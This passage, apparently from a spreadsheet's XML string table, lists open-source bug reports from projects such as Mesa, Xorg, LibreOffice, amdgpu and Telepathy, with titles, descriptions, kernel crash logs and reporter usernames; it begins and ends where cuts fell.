            Names=org.freedesktop.ConfigurationDatabaseorg.gnome.GConf
            Exec=/usr/libexec/gconfd-2
There are two errors in the above sample service file.
First a typo Names should be Name.
Second can not specify multiple names.</t>
  </si>
  <si>
    <t>LIBREOFFICE-35081</t>
  </si>
  <si>
    <t>Remove IIT-M Mirror for Indian IPs or Allow Selection of Mirrors</t>
  </si>
  <si>
    <t>When I try to download LibreOffice 3.3.1 I'm automatically redirected to http://ftp.iitm.ac.in/tdf/libreoffice/stable/3.3.1/rpm/x86/LibO_3.3.1_Linux_x86_install-rpm_en-US.tar.gz possibly based on geo-location of my IP. This happens *every time* for me.
Unfortunately this is a *very slow* mirror. (This problem seems to have been
inherited from OpenOffice.org as I used to face the same issue there.)
Please either remove this mirror from your mirrors' list or at least
provide an easy way for users to download from an alternate mirror.</t>
  </si>
  <si>
    <t>rmathew</t>
  </si>
  <si>
    <t>MESA-96696</t>
  </si>
  <si>
    <t>[g965] assertion in piglit.spec.!opengl 1_2.tex3d-maxsize</t>
  </si>
  <si>
    <t>bisected to mesa 727a9b24933d384f5440ed4318fb720ed11d6dd1
/tmp/build_root/m64/lib/piglit/bin/tex3d-maxsize -auto
Max 3D texture size: 512 x 512 x 1024
Standard Error
Mesa: User error: GL_OUT_OF_MEMORY in glTexImage3D(image too large: 2048 x 2048 x 2048 GL_RGBA8 format)
intel_do_flush_locked failed: Argument list too long
tex3d-maxsize: /home/jenkins/workspace/Leeroy_5/repos/mesa/src/mesa/vbo/vbo_exec_api.c:1253: vbo_exec_FlushVertices: Assertion `exec-&gt;flush_call_depth == 1' failed.</t>
  </si>
  <si>
    <t>XORG-14764</t>
  </si>
  <si>
    <t>xorg/lib/libXfont - ansification removal of xf86_ansic.h and rework on stdio wrapper</t>
  </si>
  <si>
    <t xml:space="preserve">Created attachment 14739
0001-libXfont-ansification-and-removal-of-xf86_ansic.h-de.patch
libXfont ansification and removal of xf86_ansic.h dependency
  Basically the code is now compiled as if FONTMODULE was never defined
but also removed some magic defining _XOPEN_SOURCE before including
math.h.
  Also removed some #if 0'ed code instead of fixing prototypes inside
the dead code.
  Changes to spdo_prv.h were due to defines like:
  define foo() sp_foo()
  that would not compile with the ansification in the format:
  type foo(void)
  due to the macro receiving void as an argument.
</t>
  </si>
  <si>
    <t>XORG-19269</t>
  </si>
  <si>
    <t>rv280 dual head broken slightly in 6.9.0.91</t>
  </si>
  <si>
    <t>I have this hardware plugged in:
01:00.0 VGA compatible controller: ATI Technologies Inc RV280 [Radeon 9200 SE] (rev 01) (prog-if 00 [VGA controller])
        Subsystem: Hightech Information System Ltd. Excalibur 9200SE VIVO 128M
        Flags: bus master 66MHz medium devsel latency 64 IRQ 16
        Memory at c8000000 (32-bit prefetchable) [size=128M]
        I/O ports at b800 [size=256]
        Memory at d7ef0000 (32-bit non-prefetchable) [size=64K]
        Expansion ROM at d7ec0000 [disabled] [size=128K]
        Capabilities: [58] AGP version 2.0
        Capabilities: [50] Power Management version 2
        Kernel driver in use: radeon
        Kernel modules: radeonfb
After commit c0c33dab44e6966b1702d4e8cfba3537fc6e2d5c (Fix off by one in EXA composite limit checking) composited dual-monitor setup (2 * 1024x768 Virtual 2048*1024 in xorg.conf) is broken windows  can just disappear if i move them too close to right screen's right edge. Bug visible only while xcompmgr or E16's builtin compositing manager is active. Reverting this commit fixes corruption.</t>
  </si>
  <si>
    <t>PIGLIT-27803</t>
  </si>
  <si>
    <t>glsl-fs-sampler-numbering missing glsl-tex.frag</t>
  </si>
  <si>
    <t>piglit: 4fe9794b95623b79dc0147cb3c29b275e1676967
$ ./bin/glsl-fs-sampler-numbering
Couldn't stat program shaders/glsl-tex.frag: No such file or directory</t>
  </si>
  <si>
    <t>MESA-107502</t>
  </si>
  <si>
    <t>Newest libdrm is required by amdgpu but drm_intel error is emitted</t>
  </si>
  <si>
    <t>Created attachment 140986
meson build log
Build options can be seen here
https://aur.archlinux.org/cgit/aur.git/tree/PKGBUILD?h=mesa-git#n44
And build log is of course attached. 
If I change _drm_amdgpu_ver to some fictional version number drm_intel is promptly required to be that - so I hypothesize there must be some problem with the check.</t>
  </si>
  <si>
    <t>mirh</t>
  </si>
  <si>
    <t>XORG-6208</t>
  </si>
  <si>
    <t>Coverity #875: Fix memory leaks in mouse options processing</t>
  </si>
  <si>
    <t>Untested patch to fix memory leaks from not freeing the return of xf86SetStrOption.</t>
  </si>
  <si>
    <t>DRI-97369</t>
  </si>
  <si>
    <t>AMDGPU/Iceland hangs kernel 4.8-rc2</t>
  </si>
  <si>
    <t>Since update to 4.8 series kernel hangs when Xorg tries to start up. I've tracked the issue to amdgpu driver. Blacklisting the driver makes the hang go away.
systemd-journald has recorded the following:
Aug 16 19:50:19 krejzi kernel: amdgpu 0000:01:00.0: Refused to change power state currently in D3
Aug 16 19:50:19 krejzi kernel: amdgpu 0000:01:00.0: Refused to change power state currently in D3
Aug 16 19:50:19 krejzi kernel: amdgpu 0000:01:00.0: Refused to change power state currently in D3
Aug 16 19:50:21 krejzi kernel: amdgpu 0000:01:00.0: Wait for MC idle timedout !
Aug 16 19:50:22 krejzi kernel: amdgpu 0000:01:00.0: Wait for MC idle timedout !
Aug 16 19:50:22 krejzi kernel: [drm] PCIE GART of 2048M enabled (table at 0x0000000000040000).
Aug 16 19:50:24 krejzi kernel: BUG: unable to handle kernel paging request at ffffc91c00763fec
Aug 16 19:50:24 krejzi kernel: IP: [] iceland_smu_populate_single_firmware_entry+0x4d/0x100 [amdgpu]
Aug 16 19:50:24 krejzi kernel: PGD 23700e067 PUD 0 
Aug 16 19:50:24 krejzi kernel: Oops: 0002 [#1] PREEMPT SMP
Aug 16 19:50:24 krejzi kernel: Modules linked in: iwlmvm amdkfd amdgpu ttm iwlwifi intel_vbtn
Aug 16 19:50:24 krejzi kernel: CPU: 3 PID: 129 Comm: kworker/3:2 Not tainted 4.8.0-rc2-krejzi #1
Aug 16 19:50:24 krejzi kernel: Hardware name: HP HP ProBook 470 G3/8102 BIOS N78 Ver. 01.11 05/09/2016
Aug 16 19:50:24 krejzi kernel: Workqueue: pm pm_runtime_work
Aug 16 19:50:24 krejzi kernel: task: ffff8802365b9b00 task.stack: ffff88023627c000
Aug 16 19:50:24 krejzi kernel: RIP: 0010:[]  [] iceland_smu_populate_single_firmware_entry+0x4d/0x100 [amdgpu]
Aug 16 19:50:24 krejzi kernel: RSP: 0018:ffff88023627fc40  EFLAGS: 00010202
Aug 16 19:50:24 krejzi kernel: RAX: 000000008002e000 RBX: ffff880231500000 RCX: 000000000000007e
Aug 16 19:50:24 krejzi kernel: RDX: ffffc91c00763fec RSI: 0000000000000003 RDI: 0000000000002180
Aug 16 19:50:24 krejzi kernel: RBP: ffffc90000764000 R08: 0000000000000002 R09: ffff88023627fc34
Aug 16 19:50:24 krejzi kernel: R10: 0000000000000000 R11: 0000000000000001 R12: ffff880231717500
Aug 16 19:50:24 krejzi kernel: R13: 0000000000008000 R14: 0000000000000000 R15: 0000000000000246
Aug 16 19:50:24 krejzi kernel: FS:  0000000000000000(0000) GS:ffff8802404c0000(0000) knlGS:0000000000000000
Aug 16 19:50:24 krejzi kernel: CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Aug 16 19:50:24 krejzi kernel: CR2: ffffc91c00763fec CR3: 0000000001e07000 CR4: 00000000003406e0
Aug 16 19:50:24 krejzi kernel: Stack:
Aug 16 19:50:24 krejzi kernel:  0000000000000000 ffff8802315005bc ffff880231500000 ffffffffa0085156
Aug 16 19:50:24 krejzi kernel:  ffff0040ffffffff ffff880231500000 ffff8802315037b8 0000000000000048
Aug 16 19:50:24 krejzi kernel:  0000000000000002 ffff88023627fdd0 ffff880231500000 ffffffffa008578c
Aug 16 19:50:24 krejzi kernel: Call Trace:
Aug 16 19:50:24 krejzi kernel:  [] ? iceland_smu_start+0x336/0x5d0 [amdgpu]
Aug 16 19:50:24 krejzi kernel:  [] ? iceland_dpm_resume+0x1c/0x40 [amdgpu]
Aug 16 19:50:24 krejzi kernel:  [] ? amdgpu_resume+0x58/0xa0 [amdgpu]
Aug 16 19:50:24 krejzi kernel:  [] ? amdgpu_resume_kms+0xa3/0x370 [amdgpu]
Aug 16 19:50:24 krejzi kernel:  [] ? amdgpu_pmops_runtime_resume+0x6c/0xa0 [amdgpu]
Aug 16 19:50:24 krejzi kernel:  [] ? pci_pm_runtime_resume+0x73/0xa0
Aug 16 19:50:24 krejzi kernel:  [] ? vga_switcheroo_set_dynamic_switch+0x80/0x80
Aug 16 19:50:24 krejzi kernel:  [] ? __rpm_callback+0x28/0x60
Aug 16 19:50:24 krejzi kernel:  [] ? rpm_callback+0x1a/0x70
Aug 16 19:50:24 krejzi kernel:  [] ? vga_switcheroo_set_dynamic_switch+0x80/0x80
Aug 16 19:50:24 krejzi kernel:  [] ? rpm_resume+0x3e3/0x5f0
Aug 16 19:50:24 krejzi kernel:  [] ? __switch_to+0x37/0x580
Aug 16 19:50:24 krejzi kernel:  [] ? _raw_spin_unlock_irq+0xe/0x20
Aug 16 19:50:24 krejzi kernel:  [] ? pm_runtime_work+0x4e/0xa0
Aug 16 19:50:24 krejzi kernel:  [] ? process_one_work+0x1c2/0x400
Aug 16 19:50:24 krejzi kernel:  [] ? worker_thread+0x42/0x4c0
Aug 16 19:50:24 krejzi kernel:  [] ? __schedule+0x2db/0x6a0
Aug 16 19:50:24 krejzi kernel:  [] ? process_one_work+0x400/0x400
Aug 16 19:50:24 krejzi kernel:  [] ? kthread+0xc8/0xe0
Aug 16 19:50:24 krejzi kernel:  [] ? ret_from_fork+0x1f/0x40
Aug 16 19:50:24 krejzi kernel:  [] ? kthread_worker_fn+0x170/0x170
Aug 16 19:50:24 krejzi kernel: Code: 05 48 8b 8c 0b e0 65 00 00 48 85 c9 0f 84 b7 00 00 00 48 8b 49 08 48 05 2f 03 00 00 48 c1 e0 05 48 8b 44 03 08 8b 79 14 8b 49 10  89 32 c7 42 0c 00 00 00 00 66 89 4a 02 48 89 c1 48 c1 e9 20 
Aug 16 19:50:24 krejzi kernel: RIP  [] iceland_smu_populate_single_firmware_entry+0x4d/0x100 [amdgpu]
Aug 16 19:50:24 krejzi kernel:  RSP 
Aug 16 19:50:24 krejzi kernel: CR2: ffffc91c00763fec
Aug 16 19:50:24 krejzi kernel: ---[ end trace 176c593915795723 ]---
Aug 16 19:50:24 krejzi kernel: general protection fault: 0000 [#2] PREEMPT SMP
Aug 16 19:50:24 krejzi kernel: Modules linked in: iwlmvm amdkfd amdgpu ttm iwlwifi intel_vbtn
Aug 16 19:50:24 krejzi kernel: CPU: 3 PID: 129 Comm: kworker/3:2 Tainted: G      D         4.8.0-rc2-krejzi #1
Aug 16 19:50:24 krejzi kernel: Hardware name: HP HP ProBook 470 G3/8102 BIOS N78 Ver. 01.11 05/09/2016
Aug 16 19:50:24 krejzi kernel: task: ffff8802365b9b00 task.stack: ffff88023627c000
Aug 16 19:50:24 krejzi kernel: RIP: 0010:[]  [] queued_spin_lock_slowpath+0x150/0x190
Aug 16 19:50:24 krejzi kernel: RSP: 0018:ffff88023627fe70  EFLAGS: 00010082
Aug 16 19:50:24 krejzi kernel: RAX: ccccccccccce3fbc RBX: ffff88023627ff18 RCX: ffff8802404d72c0
Aug 16 19:50:24 krejzi kernel: RDX: 0000000000002d47 RSI: ffffffff81c4c914 RDI: 0000000000100000
Aug 16 19:50:24 krejzi kernel: RBP: 0000000000000000 R08: 00000000000000ff R09: 0000000000000000
Aug 16 19:50:24 krejzi kernel: R10: 00000000b98c6018 R11: ffff880237003200 R12: ffff8802404d72c0
Aug 16 19:50:24 krejzi kernel: R13: 0000000000000046 R14: ffffc91c00763fec R15: 0000000000000009
Aug 16 19:50:24 krejzi kernel: FS:  0000000000000000(0000) GS:ffff8802404c0000(0000) knlGS:0000000000000000
Aug 16 19:50:24 krejzi kernel: CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Aug 16 19:50:24 krejzi kernel: CR2: 0000000000000028 CR3: 00000002240c9000 CR4: 00000000003406e0
Aug 16 19:50:24 krejzi kernel: Stack:
Aug 16 19:50:24 krejzi kernel:  ffff88023627ff18 0000000000000282 0000000000000000 ffffffff818c4e61
Aug 16 19:50:24 krejzi kernel:  ffff88023627ff18 ffff88023627ff10 ffffffff810f7103 ffff8802365ba210
Aug 16 19:50:24 krejzi kernel:  ffff8802365b9b00 0000000000000000 ffffffff810bcf9c ffff8802365b9b00
Aug 16 19:50:24 krejzi kernel: Call Trace:
Aug 16 19:50:24 krejzi kernel:  [] ? _raw_spin_lock_irqsave+0x31/0x40
Aug 16 19:50:24 krejzi kernel:  [] ? complete+0x13/0x40
Aug 16 19:50:24 krejzi kernel:  [] ? mm_release+0x9c/0x120
Aug 16 19:50:24 krejzi kernel:  [] ? do_exit+0x70a/0xad0
Aug 16 19:50:24 krejzi kernel:  [] ? rewind_stack_do_exit+0x17/0x20
Aug 16 19:50:24 krejzi kernel:  [] ? kthread_worker_fn+0x170/0x170
Aug 16 19:50:24 krejzi kernel: Code: b8 01 00 00 00 66 89 03 5b 5d 41 5c c3 c1 ea 12 83 e0 03 83 ea 01 48 c1 e0 04 48 63 d2 48 05 c0 72 01 00 48 03 04 d5 60 03 ea 81  89 08 8b 41 08 85 c0 75 09 f3 90 8b 41 08 85 c0 74 f7 4c 8b 
Aug 16 19:50:24 krejzi kernel: RIP  [] queued_spin_lock_slowpath+0x150/0x190
Aug 16 19:50:24 krejzi kernel:  RSP 
Aug 16 19:50:24 krejzi kernel: ---[ end trace 176c593915795724 ]---
Aug 16 19:50:24 krejzi kernel: Fixing recursive fault but reboot is needed!
Aug 16 19:50:24 krejzi kernel: BUG: scheduling while atomic: kworker/3:2/129/0x00000003
Aug 16 19:50:24 krejzi kernel: Modules linked in: iwlmvm amdkfd amdgpu ttm iwlwifi intel_vbtn
Aug 16 19:50:24 krejzi kernel: Preemption disabled at:[]           (null)
Aug 16 19:50:24 krejzi kernel: 
Aug 16 19:50:24 krejzi kernel: CPU: 3 PID: 129 Comm: kworker/3:2 Tainted: G      D         4.8.0-rc2-krejzi #1
Aug 16 19:50:24 krejzi kernel: Hardware name: HP HP ProBook 470 G3/8102 BIOS N78 Ver. 01.11 05/09/2016
Aug 16 19:50:24 krejzi kernel:  0000000000000086 00000000b523baa8 ffffffff8132745c ffff8802404d67c0
Aug 16 19:50:24 krejzi kernel:  00000000000167c0 ffffffff810de8a7 ffffffff818c09bf ffff8802365b9b00
Aug 16 19:50:24 krejzi kernel:  00000000b523baa8 ffff880236280000 000000000000000b 0000000000000000
Aug 16 19:50:24 krejzi kernel: Call Trace:
Aug 16 19:50:24 krejzi kernel:  [] ? dump_stack+0x46/0x5a
Aug 16 19:50:24 krejzi kernel:  [] ? __schedule_bug+0x57/0xb0
Aug 16 19:50:24 krejzi kernel:  [] ? __schedule+0x57f/0x6a0
Aug 16 19:50:24 krejzi kernel:  [] ? schedule+0x36/0x90
Aug 16 19:50:24 krejzi kernel:  [] ? do_exit+0x8b6/0xad0
Aug 16 19:50:24 krejzi kernel:  [] ? rewind_stack_do_exit+0x17/0x20
Aug 16 19:50:24 krejzi kernel:  [] ? kthread_worker_fn+0x170/0x170
Aug 16 19:50:24 krejzi kernel: BUG: unable to handle kernel paging request at ffffffffffffffd8
Aug 16 19:50:24 krejzi kernel: IP: [] kthread_data+0x7/0x10
Relevant dmesg output from amdgpu load time (also obtained from journal)
Aug 16 19:49:49 krejzi kernel: [drm] amdgpu kernel modesetting enabled.
Aug 16 19:49:49 krejzi kernel: vga_switcheroo: detected switching method \_SB_.PCI0.GFX0.ATPX handle
Aug 16 19:49:49 krejzi kernel: ATPX version 1 functions 0x00000003
Aug 16 19:49:49 krejzi kernel: ATPX Hybrid Graphics
Aug 16 19:49:49 krejzi kernel: iwlwifi 0000:03:00.0: loaded firmware version 22.361476.0 op_mode iwlmvm
Aug 16 19:49:49 krejzi kernel: CRAT table not found
Aug 16 19:49:49 krejzi kernel: Finished initializing topology ret=0
Aug 16 19:49:49 krejzi kernel: kfd kfd: Initialized module
Aug 16 19:49:49 krejzi kernel: amdgpu 0000:01:00.0: enabling device (0006 -&gt; 0007)
Aug 16 19:49:49 krejzi kernel: [drm] initializing kernel modesetting (TOPAZ 0x1002:0x6900 0x103C:0x811C 0x83).
Aug 16 19:49:49 krejzi kernel: [drm] register mmio base: 0xE2000000
Aug 16 19:49:49 krejzi kernel: [drm] register mmio size: 262144
Aug 16 19:49:49 krejzi kernel: [drm] doorbell mmio base: 0xE0000000
Aug 16 19:49:49 krejzi kernel: [drm] doorbell mmio size: 2097152
Aug 16 19:49:49 krejzi kernel: [drm] probing gen 2 caps for device 8086:9d10 = 1724843/e
Aug 16 19:49:49 krejzi kernel: [drm] probing mlw for device 8086:9d10 = 1724843
Aug 16 19:49:49 krejzi kernel: vga_switcheroo: enabled
Aug 16 19:49:49 krejzi kernel: ATOM BIOS: HP/Quanta
Aug 16 19:49:49 krejzi kernel: [drm] GPU not posted. posting now...
Aug 16 19:49:49 krejzi kernel: [drm] Changing default dispclk from 0Mhz to 600Mhz
Aug 16 19:49:49 krejzi kernel: amdgpu 0000:01:00.0: VRAM: 2048M 0x0000000000000000 - 0x000000007FFFFFFF (2048M used)
Aug 16 19:49:49 krejzi kernel: amdgpu 0000:01:00.0: GTT: 2048M 0x0000000080000000 - 0x00000000FFFFFFFF
Aug 16 19:49:49 krejzi kernel: [drm] Detected VRAM RAM=2048M BAR=256M
Aug 16 19:49:49 krejzi kernel: [drm] RAM width 64bits DDR3
Aug 16 19:49:49 krejzi kernel: [TTM] Zone  kernel: Available graphics memory: 4027936 kiB
Aug 16 19:49:49 krejzi kernel: [TTM] Zone   dma32: Available graphics memory: 2097152 kiB
Aug 16 19:49:49 krejzi kernel: [TTM] Initializing pool allocator
Aug 16 19:49:49 krejzi kernel: [TTM] Initializing DMA pool allocator
Aug 16 19:49:49 krejzi kernel: [drm] amdgpu: 2048M of VRAM memory ready
Aug 16 19:49:49 krejzi kernel: [drm] amdgpu: 2048M of GTT memory ready.
Aug 16 19:49:49 krejzi kernel: [drm] GART: num cpu pages 524288 num gpu pages 524288
Aug 16 19:49:49 krejzi kernel: [drm] PCIE GART of 2048M enabled (table at 0x0000000000040000).
Aug 16 19:49:49 krejzi kernel: [drm] Supports vblank timestamp caching Rev 2 (21.10.2013).
Aug 16 19:49:49 krejzi kernel: [drm] Driver supports precise vblank timestamp query.
Aug 16 19:49:49 krejzi kernel: amdgpu 0000:01:00.0: amdgpu: using MSI.
Aug 16 19:49:49 krejzi kernel: [drm] amdgpu: irq initialized.
Aug 16 19:49:49 krejzi kernel: amdgpu 0000:01:00.0: fence driver on ring 0 use gpu addr 0x0000000080000010 cpu addr 0xffff880231523010
Aug 16 19:49:49 krejzi kernel: amdgpu 0000:01:00.0: fence driver on ring 1 use gpu addr 0x0000000080000020 cpu addr 0xffff880231523020
Aug 16 19:49:49 krejzi kernel: amdgpu 0000:01:00.0: fence driver on ring 2 use gpu addr 0x0000000080000030 cpu addr 0xffff880231523030
Aug 16 19:49:49 krejzi kernel: amdgpu 0000:01:00.0: fence driver on ring 3 use gpu addr 0x0000000080000040 cpu addr 0xffff880231523040
Aug 16 19:49:49 krejzi kernel: amdgpu 0000:01:00.0: fence driver on ring 4 use gpu addr 0x0000000080000050 cpu addr 0xffff880231523050
Aug 16 19:49:49 krejzi kernel: amdgpu 0000:01:00.0: fence driver on ring 5 use gpu addr 0x0000000080000060 cpu addr 0xffff880231523060
Aug 16 19:49:49 krejzi kernel: amdgpu 0000:01:00.0: fence driver on ring 6 use gpu addr 0x0000000080000070 cpu addr 0xffff880231523070
Aug 16 19:49:49 krejzi kernel: amdgpu 0000:01:00.0: fence driver on ring 7 use gpu addr 0x0000000080000080 cpu addr 0xffff880231523080
Aug 16 19:49:49 krejzi kernel: amdgpu 0000:01:00.0: fence driver on ring 8 use gpu addr 0x0000000080000090 cpu addr 0xffff880231523090
Aug 16 19:49:49 krejzi kernel: amdgpu 0000:01:00.0: fence driver on ring 9 use gpu addr 0x00000000800000a0 cpu addr 0xffff8802315230a0
Aug 16 19:49:49 krejzi kernel: amdgpu 0000:01:00.0: fence driver on ring 10 use gpu addr 0x00000000800000b0 cpu addr 0xffff8802315230b0
Aug 16 19:49:49 krejzi kernel: [drm] ring test on 0 succeeded in 15 usecs
Aug 16 19:49:49 krejzi kernel: [drm] ring test on 1 succeeded in 19 usecs
Aug 16 19:49:49 krejzi kernel: [drm] ring test on 2 succeeded in 15 usecs
Aug 16 19:49:49 krejzi kernel: [drm] ring test on 3 succeeded in 5 usecs
Aug 16 19:49:49 krejzi kernel: [drm] ring test on 4 succeeded in 2 usecs
Aug 16 19:49:49 krejzi kernel: [drm] ring test on 5 succeeded in 2 usecs
Aug 16 19:49:49 krejzi kernel: [drm] ring test on 6 succeeded in 2 usecs
Aug 16 19:49:49 krejzi kernel: [drm] ring test on 7 succeeded in 3 usecs
Aug 16 19:49:49 krejzi kernel: [drm] ring test on 8 succeeded in 2 usecs
Aug 16 19:49:49 krejzi kernel: [drm] ring test on 9 succeeded in 6 usecs
Aug 16 19:49:49 krejzi kernel: [drm] ring test on 10 succeeded in 4 usecs
Aug 16 19:49:49 krejzi kernel: [drm] ib test on ring 0 succeeded
Aug 16 19:49:49 krejzi kernel: [drm] ib test on ring 1 succeeded
Aug 16 19:49:49 krejzi kernel: [drm] ib test on ring 2 succeeded
Aug 16 19:49:49 krejzi kernel: [drm] ib test on ring 3 succeeded
Aug 16 19:49:49 krejzi kernel: [drm] ib test on ring 4 succeeded
Aug 16 19:49:49 krejzi kernel: [drm] ib test on ring 5 succeeded
Aug 16 19:49:49 krejzi kernel: [drm] ib test on ring 6 succeeded
Aug 16 19:49:49 krejzi kernel: [drm] ib test on ring 7 succeeded
Aug 16 19:49:49 krejzi kernel: [drm] ib test on ring 8 succeeded
Aug 16 19:49:49 krejzi kernel: [drm:sdma_v2_4_ring_test_ib [amdgpu]] *ERROR* amdgpu: fence wait failed (1000).
Aug 16 19:49:49 krejzi kernel: [drm:amdgpu_ib_ring_tests [amdgpu]] *ERROR* amdgpu: failed testing IB on ring 9 (1000).
Aug 16 19:49:49 krejzi kernel: [drm:sdma_v2_4_ring_test_ib [amdgpu]] *ERROR* amdgpu: fence wait failed (1000).
Aug 16 19:49:49 krejzi kernel: [drm:amdgpu_ib_ring_tests [amdgpu]] *ERROR* amdgpu: failed testing IB on ring 10 (1000).
Aug 16 19:49:49 krejzi kernel: [drm] Initialized amdgpu 3.3.0 20150101 for 0000:01:00.0 on minor 1
Radeon R7 M340 Hybrid Graphics Topaz/Iceland.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-7490</t>
  </si>
  <si>
    <t>openclipart: new account for Carsten</t>
  </si>
  <si>
    <t>Real name Carsten Schmitz
username c_schmitz
mail carsten.schmitz.hh@gmx.de
(When I ask for a new account I don't have link for file attachment so I gonna
validate and come back in this bug. Maybe link attach files will appear under
keyword ?)</t>
  </si>
  <si>
    <t>patricia.fidi01</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-4810</t>
  </si>
  <si>
    <t>Mailing list needed.</t>
  </si>
  <si>
    <t>We need a mailing list harfbuzz@lists.fd.o should do it.</t>
  </si>
  <si>
    <t>CAIRO-29501</t>
  </si>
  <si>
    <t>cairo_surface_flush() does not undo a clip done on a DirectFB surface</t>
  </si>
  <si>
    <t>Take the following code:
    cairo_save(pCairo)
    cairo_rectangle(pCairo x y w h)
    cairo_clip(pCairo)
    cairo_translate(pCairo x y)
    pango_cairo_show_layout(pCairo pLayout)
    cairo_restore(pCairo)
After the cairo_restore() if I try to do a DirectFB drawing operation on the surface outside the region specified for the cairo clip there is no drawing done.
I'm not sure exactly where the bug is though it may be in pango.  If I remove either the cairo_clip() or the pango_cairo_show_layout() I can still draw correctly on the surface but if I have both the clip remains in effect.
Adding:
    pFBSurface-&gt;SetClip(pFBSurface NULL)
after the cairo_restore() allows me to draw correctly to the surface again.</t>
  </si>
  <si>
    <t>allison.newman</t>
  </si>
  <si>
    <t>XORG-81702</t>
  </si>
  <si>
    <t>SIGSEGV while using skype with SNA accel (_sna_pixmap_move_to_cpu)</t>
  </si>
  <si>
    <t>Created attachment 103381
XOrg debug backtrace for skype crash.
This looks too much like bug 71415 or at least the behaviour is similar: When using skype under OpenSuSE 13.1 with the XOrg Intel driver v 2.99.906 and the default SNA accel method enabled the server crashes and returns to GDM login however the backtrace seems different from the one crashing empathy which I reported back in bug 71415.
As a work around and as you would suppose switching back to older UXA fixes this issue.
I'm attaching the trace. Let me know if you need more info. Thanks!</t>
  </si>
  <si>
    <t>gus</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-5192</t>
  </si>
  <si>
    <t>Patch for Saitek Eclipse</t>
  </si>
  <si>
    <t>The Saitek Eclipse gaming keyboard has three extra keys for raise volume lower   
volume and mute.  These keys map to the keycodes (as returned by xev):   
   lower volume: 174   
   raise volume: 176   
   mute: 160   
The attached patch adds support for the Saitek Eclipse on my system (Kubuntu  
Breezy).  After applying the patch the buttons correctly change the volume and  
mute/unmute sound.  
The root of the patch (on my system) is at /usr/X11R6/lib/X11/.  Hopefully 
someone finds it useful. 
Eric</t>
  </si>
  <si>
    <t>esorton</t>
  </si>
  <si>
    <t>MESA-28138</t>
  </si>
  <si>
    <t>[G45] Regnum Online sparkling in in-game rendering</t>
  </si>
  <si>
    <t>Created attachment 35700
Screenshot of the bug
The game Regnum Online does not render correctly if shaders is used. 
By dumping the shaders used by the game I think I found the one causing the problem it's at least the only one failing to compile:
/* Compile status: fail */
/* Log Info: */
Error: Array index out of bounds (index=0 size=0)
Error: Array index out of bounds (index=1 size=0)
Shaders doesn't work with the game with Mesa 7.7 7.8 have the same bug as this one so it's not a regression.
It's possible to run the game with a fixed function pipeline too so this isn't too big a problem.
The game requires signing up but doesn't cost anything to play.
System environment:
-- chipset: G45 / ICH10R
-- system architecture: 32-bit
-- Linux distribution: Debian unstable
-- Machine or mobo model: Asus P5Q-EM
-- Display connector: DVI
-- xf86-video-intel: 58b089febceca1e915607bb723ee658aaa9dbed3
-- xserver: 1.8.1
-- mesa: 0b94c05c2827336e2abf46629590edf05a6b3f64
-- drm: a3305b076c005e0d3bd55da0214e91413cf65b48
-- kernel: 2.6.34-rc6</t>
  </si>
  <si>
    <t>TELEPATHY-17330</t>
  </si>
  <si>
    <t>Implement Channel and Channel.Group properties including TargetID</t>
  </si>
  <si>
    <t>Implement TargetHandleType etc. properties on all channels including the TargetID property that was added in telepathy-spec 0.17.9.
See Gabble for reference code.</t>
  </si>
  <si>
    <t>DRI-107769</t>
  </si>
  <si>
    <t>[CI][DRMTIP] igt@gem_persistent_relocs@forked-faulting-reloc-thrashing - fail - Failed assertion: test == 0xdeadbeef</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_91/fi-byt-j1900/igt@gem_persistent_relocs@forked-faulting-reloc-thrashing.html
(gem_persistent_relocs:1233) CRITICAL: Test assertion failure function do_test file ../tests/gem_persistent_relocs.c:256:
(gem_persistent_relocs:1233) CRITICAL: Failed assertion: test == 0xdeadbeef
(gem_persistent_relocs:1233) CRITICAL: mismatch in buffer 0: 0x00000000 instead of 0xdeadbeef at offset 0
Subtest forked-faulting-reloc-thrashing failed.
No log.
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_94/fi-ivb-3770/igt@gem_persistent_relocs@forked-interruptible-faulting-reloc-thrashing.html
(gem_persistent_relocs:1400) CRITICAL: Test assertion failure function do_test file ../tests/gem_persistent_relocs.c:256:
(gem_persistent_relocs:1400) CRITICAL: Failed assertion: test == 0xdeadbeef
(gem_persistent_relocs:1400) CRITICAL: mismatch in buffer 0: 0x00000000 instead of 0xdeadbeef at offset 0
Subtest forked-interruptible-faulting-reloc-thrashing failed.
No log.</t>
  </si>
  <si>
    <t>ACCOUNTSSERVICE-51039</t>
  </si>
  <si>
    <t>[PATCH] lib: fix memory leaks in act-user</t>
  </si>
  <si>
    <t>Created attachment 62968
fix memory leaks in act-user patch</t>
  </si>
  <si>
    <t>rat4vier</t>
  </si>
  <si>
    <t>LIBREOFFICE-50722</t>
  </si>
  <si>
    <t>scroll bars keep moving out of position until they disappear when zooming</t>
  </si>
  <si>
    <t>In calc page preview when you keep zooming in to the page such that a part of the
page get obscured both of the right and bottom scroll bars start moving away
from the edge of the window frame toward the document eventually they will even
disappear. Resizing the window will correct it.</t>
  </si>
  <si>
    <t>TELEPATHY-11977</t>
  </si>
  <si>
    <t>OIM broken</t>
  </si>
  <si>
    <t>DEBUG:Transport:&lt;&lt;&lt; MSG Hotmail Hotmail
        MIME-Version: 1.0\r\n
        Content-Type: text/x-msmsgsinitialmdatanotification charset=UTF-8\r\n
        \r\n
        Mail-Data: 00004096002048001162007-08-11T14:42:53.460Z0996johann.prieur@gmail.comB0AE139A-E29F-4530-8A3A-2AAD1FBFD63B00000000-0000-0000-0000-000000000009=?utf-8?B?Sm9oYW5u?=1162007-08-11T14:43:15.550Z0972johann.prieur@gmail.comEDDB60A4-7494-4EC0-8B34-C0710F4F3A9E00000000-0000-0000-0000-000000000009=?utf-8?B?Sm9oYW5u?=\r\n
        Inbox-URL: /cgi-bin/HoTMaiL\r\n
        Folders-URL: /cgi-bin/folders\r\n
        Post-URL: http://www.hotmail.com\r\n
DEBUG:Transport:&lt;&lt;&lt; CHG 10 NLN 1879048192
DEBUG:Transport:&lt;&lt;&lt; UUX 11 0
DEBUG:Service:&gt;&gt;&gt; POST /RST.srf HTTP/1.0
Content-Length: 1969
Proxy-Connection: Keep-Alive
Host: login.live.com:443
Accept: text/*
User-Agent: gnet/0.1 (Linux i686)
